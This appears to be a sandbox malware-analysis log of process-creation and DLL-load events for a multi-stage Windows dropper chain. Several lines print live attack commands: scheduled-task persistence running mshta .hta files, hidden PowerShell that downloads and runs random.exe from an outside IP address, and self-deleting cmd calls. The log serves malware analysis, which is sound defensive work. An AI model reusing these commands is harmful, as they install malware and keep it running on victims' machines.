Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe "C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe "C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe "C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe "C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\10235700121\am_no.cmd" "
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe "C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Process created: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe "C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe"
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe "C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe"
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe "C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe"
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe" & exit
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe | Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE "C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE"
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "F80nHmaMuIn" /tr "mshta \"C:\Temp\J9hHfTRUK.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\J9hHfTRUK.hta"
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe | Process created: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe "C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe | Process created: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe "C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe"
Source: C:\Windows\System32\mshta.exe | Process created: unknown unknown
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn pmi96maNnhC /tr "mshta C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta" /sc minute /mo 25 /ru "user" /f
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn pmi96maNnhC /tr "mshta C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta" /sc minute /mo 25 /ru "user" /f
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: mstask.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: dui70.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: duser.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: chartv.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: winsta.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\M6gQuZPvgY.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe | Section loaded: apphelp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: apphelp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: winmm.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: windows.storage.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: wldp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: winhttp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: webio.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: mswsock.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: iphlpapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: winnsi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: sspicli.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: dnsapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: rasadhlp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: fwpuclnt.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: schannel.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: mskeyprotect.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: ntasn1.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: ncrypt.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: ncryptsslp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: msasn1.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: cryptsp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: rsaenh.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: cryptbase.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: gpapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: dpapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: uxtheme.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: wbemcomn.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: amsi.dll
